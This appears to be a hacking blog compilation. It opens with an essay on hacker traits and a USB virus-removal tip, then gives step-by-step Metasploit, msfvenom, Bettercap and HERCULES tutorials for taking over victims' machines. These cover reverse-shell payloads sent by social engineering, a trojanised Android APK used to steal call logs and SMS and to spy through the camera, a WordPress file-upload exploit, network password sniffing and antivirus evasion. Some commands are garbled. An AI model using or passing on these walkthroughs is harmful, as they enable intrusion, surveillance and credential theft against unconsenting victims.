7 Qualities of Highly Effective Hackers

When asked to write on this topic, I admit that it made me fringe just a bit. Because I don’t consider myself to be a highly effective hacker. I find myself as a noob everywhere that I’m trying to learn new things, or I am frustrated with the most ridiculous “hacker” material on the web, written by school-taught programmers that follow step by step instructions out of a manual that everyone has already read. Then I thought to myself.. “That’s it!” That is Number One!

Quality One- Always A N00b

Yea. You heard it, and it sounds crazy, but do you ever wonder why on the forums and comments you always see the trolls calling the weakest link a noob and picking on them.. and then THEY are revealed to be newbies also? Well guess what? I am ALWAYS in over my head, trying to learn things that are too much for me. When I go through phases where I only visit sites and forums where I already am adept at the subject or skill level, at hand, I find that not only have months gone by without me learning anything new.

I have also gotten rusty at things I was beginning to learn. So as crazy as it sounds, I believe that a highly effective hacker is always in places where he is a noob. Always learning things he had no idea of and constantly finding things that overwhelm his mind, until a week later when he is now teaching others how to do it and busy with something else he doesn’t yet understand. This is the way of intellectual progress. When you see guys on these forums and blog comments, picking on newbies and boasting the same skills with nothing new, know that they are at their peak. Their time has come and gone because they have settled for what they know and are satisfied with it in an ever evolving and changing world of technology.

Quality Two- Curiosity

Do you think for a moment that the l33t ones out there, finding new exploits and breaking into systems are just following step by step guides or motivated by their job or a pay check? If so, I am sorry to rain on your parade, but an effective hacker has an obsessive curiosity.

These personal drives will bring a person farther in skill than the need for a promotion or recognition will. “I wonder what would happen if I tried to..” “What do you suppose they keep in here..” “OMG! What if I trick it into running this as a…” These are the basic thought patterns of an effective hacker. Not just when he has a job to do. I mean always. For example when you were a kid (or even now) played a video game and found a weird glitch (not necessarily a ‘cheat’) that you thought was funny. “Oh wow. If I walk in this corner backward he kinda gets stuck there.. UPSIDE DOWN! LOL”, “What would happen if I do that and try to jump at the same time? Oh weird! It drops my character where I’m not even supposed to be yet!”. OK This is the curiosity that intrigues an effective hacker. He wants to make things work in ways they were not originally intended to.

Quality Three- Enjoys being places he doesn’t belong

Hey sorry all you white-hats out there, but it’s true. I won’t condone trespassing, but many of the most effective hackers get serious pleasure out of being places they do not belong. I once read that everything that drives a man is a form of penetration, of inserting what he feels is himself into something he feels is not himself. I don’t know about all that, but some of these guys get pleasure in the same way that a voyeur enjoys watching what he is not allowed to. They enjoy getting into places they are not supposed to be. Now I am not encouraging this behaviour, just laying out the facts. The reason these people find ways to get into things is because these fundamental, basic drives compel them to. It closes the gap of all the things he must learn in order to achieve what he wants.

Quality Four-An unbalanced lifestyle

I often find myself engorged in a project (not just computer related) and nothing else exists. If you ever see these skinny or fat guys beating at their computer at 3 in the morning with empty coke cans and full ashtrays all around until they finally call it a day.. and then it’s time to go back in to work. That’s them. LOL Now I am not saying that being an effective hacker means they do not have a life (though some may not). Alot of very successful people get obsessed with what they are working on and do nothing but that.. For a while. Then they go through a phase where they are obsessed with something different.

Quality Five- Likes to break things

Come on guys! We’re hackers! We love to smash things apart and see what happens. Because face it, it’s much easier to break something than to make it and it rewards a valuable opportunity to put it back together in a different way.

Quality Six- Well Organized

In the beginning, it’s ok to have files, folders, projects, and programs littered amongst temporary directories, hard drives and OS’s. But eventually that’s going to be a huge problem. The most efficient hackers have definitely learned to become very well organized multitaskers. You’ll see varions windows and terminals open, seperate directories for everything, that are well categorized, a task manager changing process priorities as he’s bouncing from one project to the other, across his screen.

Quality Seven- Everything is Insecure until… Never.

The most efficient hackers know that all software, hardware, and access controls are man made and riddled with flaws, predictabilities, and unpredictabilities, a reflection of the creators. People. Nothing can ever be completely trusted, just as no person can be completely trusted.

Computer Virus

Each file and folder have the following attributes:

1).  Archive A

2).  Read Only R

3).  Hidden H

4).  System S

-(minus) sign before an attribute it means removing attributes and +(plus) sign mean giving attributes to the file or folder.

example ) attrib -r -a -s -h file.txt  this will remove all attributes from file.txt  and attrib +r +a +s +h file.txt  will give all attributes to file.txt .

If pen drive or other hard drive is infected by virus ,Command prompt is the best option.Follow the steps given below.

1).  Go to the command prompt by start>all programs>accessories>command prompt or press windows key+r and enter cmd .

2).  Go to the drive where you want to delete virus example write d: to go to D drive .

3).  Type “attrib -r -s -h *.* /s /d” without quotations  and press enter .

4)press dir /a .

5).  Delete all the .inf, .exe , .dll, .log extension file if they are not your files by using dos del command .

Example:

del autorun.inf

if any file is not deleting rename that file by rename command

Example:  rename dst.exe ms.bak this will rename dst.exe to ms.bak

 

Now Your pen drive is virus free .

Hack Remote Linux PC using PHP File

This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

Exploit Targets

Linux

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.22 (IP of Local Host)

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)>exploit

Copy the highlighted text shown In below window and send it to the victim

When the victim paste the highlighted text in terminal and run it ,you get the whole access of victim system

Y

Exploit Windows 10 PC using msfven.sh Script

Open your kali Linux terminal and type the following command

https://github.com/wayneaswilliams/msfvenom_custom_encoding.git

Now type following command to create payload

./msfven.sh

 Now Enter IP addresses of your kali Linux pc. And press enter. In next step it will ask for port no. Enter the port no.  Such as 4445 and press enter

In next step use payloads e.g.windows/meterpreter/reverse_tcp and press enter

Now it will show a file with name tcp_445.exe now send your exe files to victim using any social engineering technique.

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.140

exploit

 Now send your exe files to victim using any social engineering technique. Now when the victim will use exe you will get the meterpreter of victim PC.

Yo

Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit

In 2015 we were using msfpayload and msfencode tools to perform this hack but on June 8th 2015 both msfpayload and msfencode is replaced by msfvenom tool. So simply now msfvenom is an updated combination of Msfpayload and Msfencode tool

Now by using msfvenom we will create meterpreter payload for android.

Open you Kail Linux terminal and type:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 >/root/Desktop/TempleRun2.apk

Now it will automatically generate the malicious but interesting to install apk files and store it to your Kali Linux desktop.

/root/Desktop/TempleRun2.apk

Send this TempleRun2.apk file to victim mobile, as soon as they open and install it you will get access of victim android mobile.

Now we have to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

Go to your Kali Linux terminal and type: msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.0.102

set lport 4444

exploit

Now you are in victim android mobile from here you can do many things like:

To check whether victim mobile is rooted or not for this type following command:

check_root

Check victim’s mobile exact location type:

wlan_geolocate

it will show the exact location of victim mobile on Google maps

To download victim call logs from their mobile type:

dump_calllog

It will download and store txt file of call logs in your root directory

/root/calllog_dump.txt

To download sms dump type:

dump_sms

it will also download and store txt file of sms dump in your root directory

To send sms from hacked android mobile phone to someone else type:

send_sms -d “number of the person whom you want to send sms” -t “message you want send”

ex: send_sms -d 9599***847 -t hacked

To capture pic from victim’s mobile camera type:

webcam_list

it will provides you a list of all webcams on the victim mobile then select from the list and type:

webcam_snap 2

to stream live feed from victim’s mobile camera type:

webcam_stream

it will automatically open up a browser and you will see live feed from their camera

Author:

Hack Wallpaper of Remote Android Phone using Metasploit

This module will set the desktop wallpaper background on the specified session. The method of setting the wallpaper depends on the platform type.

First Hack the Victim Android Phone Using Metasploit (Tutorial How to Hack Remote PC)

msf > use post/multi/manage/set_wallpaper

msf post (set_wallpaper)>set WALLPAPER_FILE  /root/Desktop/hack.jpg

msf post (set_wallpaper)>set session 1

msf post (set_wallpaper)>exploit

Y

Hack Web Server using WordPress WP EasyCart Unrestricted File Upload

WordPress Shopping Cart (WP EasyCart) Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the /inc/amfphp/administration/banneruploaderscript.php script does not properly verify or sanitize user-uploaded files. By uploading a .php file, the remote system will place the file in a user-accessible path. Making a direct request to the uploaded file will allow the attacker to execute the script with the privileges of the web server. In versions <= 3.0.8 authentication can be done by using the WordPress credentials of a user with any role. In later versions, a valid EasyCart admin password will be required that is in use by any admin user. A default installation of EasyCart will setup a user called “demouser” with a preset password of “demouser”.

 Exploit Targets

wp-easycart

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_easycart_unrestricted_file_upload

msf exploit (wp_easycart_unrestricted_file_upload)>set targeturi wordpress

msf exploit (wp_easycart_unrestricted_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_easycart_unrestricted_file_upload)>set rport 80

msf exploit (wp_easycart_unrestricted_file_upload)>exploit       

Y

Hack Gmail and Facebook Password in Network using Bettercap

bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack.

Go to Kali Linux terminal and type:

git clone https://github.com/evilsocket/bettercap.git

it will clone bettercap from github and store it in your root directory

After that change your directory. Now it’s time to install bettercap and its dependencies, it will use Ruby gems to install all its required dependencies.

To install type:

gem build bettercap.gemspec

Now type:

sudo gem install bettercap*.gem

it will install bettercap and all its dependencies using gem

Now we have installed Bettercap and start sniffer for sniffing in network.

Type in terminal:

bettercap –proxy -P post

Here you can see the hacked facebook account and victim’s username and password.

See the example below :

Y

Bypass All Antivirus and Hack Remote Windows 10 PC using Hercules

HERCULES is a special payload generator that can bypass all antivirus software.

First clone Hercules repository from github, to do so type:

https://github.com/EgeBalci/HERCULES.git

Now Open kali linux terminal in the directory that you have downloaded Hercules and type the following command

./HERCULES_x64 192.168.0.105 4444 –p windows/meterpreter/reverse_tcp –a 64 –l dynamic

Now it will save a file with name payload.exe now send your exe files to victim using any social engineering technique.

Now open kali Linux terminal and type netcat command this will attempt to initiate a TCP to the defined host on the port number specified.

nc –l –p 4444

Y